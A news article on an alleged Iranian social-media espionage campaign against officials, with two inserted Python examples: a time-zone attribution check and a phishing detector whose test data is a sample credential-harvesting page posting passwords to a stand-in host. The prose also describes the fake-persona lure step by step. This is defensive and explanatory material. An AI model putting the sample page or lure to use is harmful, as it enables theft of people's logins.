Hackers apparently based in Iran have mounted a three-year campaign of cyberespionage against high-ranking U.S. and international officials, including a four-star admiral, to gather intelligence on economic sanctions, antinuclear proliferation efforts and other issues, according to cybersecurity investigators.
Using an elaborate ruse involving more than a dozen personas working for a fake U.S. news organization, the hackers developed connections to their targets through websites like Facebook and LinkedIn to trick them into giving up personal data and logon information, the investigators say.
The alleged campaign, which dates back at least to 2011 and is still under way, principally has focused on U.S. and Israeli targets in public and private sectors, but also has included similar officials in countries such as the U.K., Saudi Arabia, Syria and Iraq, according to the investigators.
The campaign was uncovered by the cybersecurity firm iSight Partners, which has been tracking it for six months. The iSight report provides the first detailed public look inside what the investigators say is an extensive cyberespionage campaign against the U.S. by Iranian hackers, and shows to an extent not previously understood their ability to conduct extensive and lengthy targeting of key individuals, much in the mold of Chinese cyberspies.
"It is such a complex and broad-reaching, long-term espionage campaign for the Iranians," said Tiffany Jones, a senior vice president at iSight and a former National Security Council aide in the George W. Bush administration. "What they lack in technical sophistication, they make up in creativity and persistence."
ISight, which is based in Dallas, specializes in cyberthreat intelligence. Its clients include government agencies and companies across the Fortune 500.
Iranian hackers have developed a reputation for very public and destructive attacks on company websites and computer networks, particularly U.S. banks and Middle Eastern energy firms. But their clandestine cybertactics are less understood. They have infiltrated a U.S. Navy network and U.S. energy-company networks, The Wall Street Journal previously has reported.
In the past year, Iranian hackers have become among the top cybersecurity concerns for many U.S. military and intelligence officials who see them as more highly motivated to harm the U.S. than more traditional cyber-adversaries in Russia and China.
Iranian officials have denied any role in past hacking incidents, and charge the U.S. with being behind a massive cyberattack in recent years, unleashing the Stuxnet virus into Iranian computers.
The iSight report, to be released Thursday, doesn't provide direct evidence of official Iranian backing, but outlines circumstantial evidence. The website of the fake news organization used by the hackers as their cover, NewsOnAir.org, is registered in Tehran, and the hackers keep business hours consistent with both the workday and workweek in Tehran. The Persian term for swallows, "parastoo," was used as a password for some of the cyberspying software used in the campaign.
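The "business hours consistent with Tehran" observation above is a standard attribution check: convert activity timestamps to a candidate local time zone and see what share lands inside that region's working week. The script below is an added illustration and not part of the iSight report; it uses a fixed UTC+03:30 offset rather than a time-zone database (ignoring daylight-saving rules), a constructed list of activity timestamps, and an assumed Saturday-to-Wednesday, 09:00-17:00 working pattern as the hypothesis under test, alongside a U.S. Eastern hypothesis for contrast.

```python
from collections import Counter
from datetime import datetime, timedelta, timezone

# Fixed offsets instead of a tz-database lookup so the script runs offline;
# daylight-saving rules in force at the time are ignored (assumption made
# for this example, not a detail from the report).
UTC = timezone.utc
TEHRAN = timezone(timedelta(hours=3, minutes=30), name="IRST")
US_EAST = timezone(timedelta(hours=-4), name="EDT")

# Working-pattern hypotheses: (time zone, local work days, start hour, end hour).
# Python weekday(): Monday=0 ... Sunday=6. The Saturday-Wednesday pattern is an
# assumption used as the hypothesis to test, not a figure from the report.
HYPOTHESES = {
    "Tehran, Sat-Wed 09-17": (TEHRAN, {5, 6, 0, 1, 2}, 9, 17),
    "US East, Mon-Fri 09-17": (US_EAST, {0, 1, 2, 3, 4}, 9, 17),
}

# Constructed sample of attacker activity timestamps in UTC (e.g. logins to the
# persona accounts or edits to the cover site). Made up for this example.
SAMPLE_EVENTS_UTC = [
    "2014-05-17T05:30:00Z",  # Sat 09:00 Tehran
    "2014-05-17T09:00:00Z",  # Sat 12:30 Tehran
    "2014-05-18T10:15:00Z",  # Sun 13:45 Tehran
    "2014-05-19T04:45:00Z",  # Mon 08:15 Tehran (before start of day)
    "2014-05-20T12:45:00Z",  # Tue 16:15 Tehran
    "2014-05-21T13:40:00Z",  # Wed 17:10 Tehran (after end of day)
    "2014-05-22T07:30:00Z",  # Thu 11:00 Tehran (not a work day under the hypothesis)
    "2014-05-24T06:30:00Z",  # Sat 10:00 Tehran
    "2014-05-25T11:00:00Z",  # Sun 14:30 Tehran
]


def parse_utc(stamp):
    """Parse an ISO-8601 'Z' timestamp into an aware UTC datetime."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=UTC)


def in_business_hours(event_utc, tz, work_days, start, end):
    """True if the event falls on a work day between start and end local hours."""
    local = event_utc.astimezone(tz)
    return local.weekday() in work_days and start <= local.hour < end


def business_hours_share(stamps, tz, work_days, start, end):
    """Fraction of events that fall inside the hypothesised working pattern."""
    events = [parse_utc(s) for s in stamps]
    hits = sum(in_business_hours(e, tz, work_days, start, end) for e in events)
    return hits / len(events)


def local_hour_histogram(stamps, tz):
    """Count events per local hour of day; a daytime cluster supports the hypothesis."""
    return Counter(parse_utc(s).astimezone(tz).hour for s in stamps)


def rank_hypotheses(stamps):
    """Order hypotheses by how much of the activity they explain as business hours."""
    scored = [(name, business_hours_share(stamps, *h)) for name, h in HYPOTHESES.items()]
    return sorted(scored, key=lambda pair: pair[1], reverse=True)


if __name__ == "__main__":
    for name, share in rank_hypotheses(SAMPLE_EVENTS_UTC):
        print(f"{share:5.0%} of events fall in business hours under '{name}'")
    hist = local_hour_histogram(SAMPLE_EVENTS_UTC, TEHRAN)
    print("Tehran local-hour histogram:", dict(sorted(hist.items())))
```

Timing evidence of this kind is circumstantial, as the report itself treats it: a handful of timestamps can be shifted by automation or by an operator deliberately working odd hours, so the share should be computed over a large event set and weighed together with registration data, language artifacts and targeting rather than on its own.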
The focus of the spying also points to Iranian interests. This campaign appears aimed at collecting a range of information that could support the development of weapons systems, provide U.S. military secrets, supply details of the U.S.-Israeli relationship, and offer new insights into U.S. plans for economic sanctions and nuclear talks, according to the investigators.
It isn't known how much of the alleged campaign iSight has uncovered, and the cybersecurity firm wouldn't identify the targets it says were affected, citing client confidentiality.
This intelligence also could be used to mount more destructive attacks, according to iSight, such as the one against the Saudi oil company Aramco in 2012, which effectively destroyed 30,000 computers.
ISight has provided its finding to the Federal Bureau of Investigation and other U.S. government organizations, and has worked with social-media companies to shut down some activity. But NewsOnAir.org remains up and running. The FBI declined to comment.
High-ranking U.S. government officials who were targeted were those working on U.S. foreign policy directly related to Iranian interests, such as nuclear proliferation and sanctions. Hackers also targeted Israeli defense contractors and lobbyists who focus on the U.S.-Israel relationship, the report alleged.
The nature of cyber research is such that it produces evidence of fragmented pieces of a campaign that researchers then must connect. Examples that iSight cites are similarly piecemeal.
With the unnamed four-star admiral, the hackers sought out and made online connections to the officer's family members, former classmates and colleagues and co-workers, according to iSight researchers. The hackers allegedly then used those connections as bona fides to get the admiral to connect, too.
Researchers at iSight declined to provide further details, citing confidentiality agreements.
A case of one senior government official shows in more detail how the hackers allegedly operated. In 2013, they friended on Facebook people who had gone to school and had served in government with the official, according to the investigators. They built up about a dozen connections over a month and then sent an invitation to connect to the official they were interested in targeting. The official accepted, giving the hackers their first foothold.
From there, the hackers sent a Facebook message to the official with links to seemingly innocuous things, the report said. One link appeared to be a YouTube video of the F-35 Joint Strike Fighter. Clicking on that link sent the official to an apparent Google sign-in page asking for a username and password. But that Web page was set up to send the username and password to the hackers and then direct the official to the video so the information theft wasn't obvious.
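The lure described above has two detectable features from the defender's side: a message link whose visible text promises one site while its href points to another, and a landing page carrying a password form that posts to a host other than the legitimate sign-in service before handing the visitor on to the promised content. The detector below is an added example, not code from the report or from iSight; the message snippet, landing page, `.invalid` host names and the `TRUSTED_LOGIN_HOSTS` allowlist are all constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hosts at which a real Google sign-in form may legitimately post.
# Assumption for this example; a deployment would load this from the
# organisation's identity-provider configuration.
TRUSTED_LOGIN_HOSTS = {"accounts.google.com"}

# Constructed sample of a social-media message: the visible text promises a
# video on youtube.com, the href goes to a different host.
SAMPLE_MESSAGE_HTML = (
    '<p>Thought you would like this: '
    '<a href="https://login-check.invalid/watch?v=f35">'
    'https://www.youtube.com/watch?v=f35</a></p>'
)

# Constructed landing page: a password form posting back to the untrusted host,
# with a hidden "continue" target that is the promised video.
SAMPLE_PAGE_URL = "https://login-check.invalid/watch?v=f35"
SAMPLE_LANDING_HTML = """<html><head><title>Sign in</title></head><body>
<form method="post" action="/collect">
  <input type="text" name="Email">
  <input type="password" name="Passwd">
  <input type="hidden" name="continue" value="https://www.youtube.com/watch?v=f35">
  <button type="submit">Sign in</button>
</form></body></html>"""


class PageParser(HTMLParser):
    """Collect anchors (href, visible text) and forms (action, password field, hidden fields)."""

    def __init__(self):
        super().__init__()
        self.links = []
        self.forms = []
        self._anchor = None
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "has_password": False, "hidden": {}}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            kind = a.get("type", "").lower()
            if kind == "password":
                self._form["has_password"] = True
            elif kind == "hidden":
                self._form["hidden"][a.get("name", "")] = a.get("value", "")
        elif tag == "a":
            self._anchor = [a.get("href", ""), ""]

    def handle_data(self, data):
        if self._anchor is not None:
            self._anchor[1] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._anchor is not None:
            self.links.append((self._anchor[0], self._anchor[1].strip()))
            self._anchor = None
        elif tag == "form":
            self._form = None


def host(url):
    return (urlparse(url).hostname or "").lower()


def mismatched_links(message_html):
    """Flag anchors whose visible text is a URL on a different host than the href."""
    parser = PageParser()
    parser.feed(message_html)
    findings = []
    for href, text in parser.links:
        shown = host(text) if text.startswith(("http://", "https://")) else ""
        if shown and shown != host(href):
            findings.append({"shown_host": shown, "actual_host": host(href), "href": href})
    return findings


def credential_harvest_indicators(landing_html, page_url):
    """Flag password forms posting outside the allowlist, noting any decoy hand-off."""
    parser = PageParser()
    parser.feed(landing_html)
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        action_host = host(urljoin(page_url, form["action"]))  # relative action resolves to the page's host
        if action_host in TRUSTED_LOGIN_HOSTS:
            continue
        finding = {"action_host": action_host, "reason": "password form posts to untrusted host"}
        for value in form["hidden"].values():
            # A hidden field carrying a third-party URL is the post-theft redirect to the promised content.
            if value.startswith(("http://", "https://")) and host(value) != action_host:
                finding["decoy_redirect"] = value
        findings.append(finding)
    return findings


if __name__ == "__main__":
    print("link mismatches:", mismatched_links(SAMPLE_MESSAGE_HTML))
    print("landing page:", credential_harvest_indicators(SAMPLE_LANDING_HTML, SAMPLE_PAGE_URL))
```

A mail or messaging gateway can apply the first check to inbound links and a URL-detonation sandbox the second to the fetched landing page; the combination (credential form on an untrusted host plus an onward redirect to the site the link advertised) is a stronger signal than either alone, and the affected account's password should be rotated and its sessions revoked the moment the user is known to have submitted the form.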
"Creating fake profiles and distributing malware are clear violations of our policies," said Facebook spokesman Jay Nancarrow. "We removed all of the offending profiles we found to be associated with the fake NewsOnAir organization, and we have used this case to further refine our systems that catch fake accounts at various points of interaction on the site and block malware from spreading."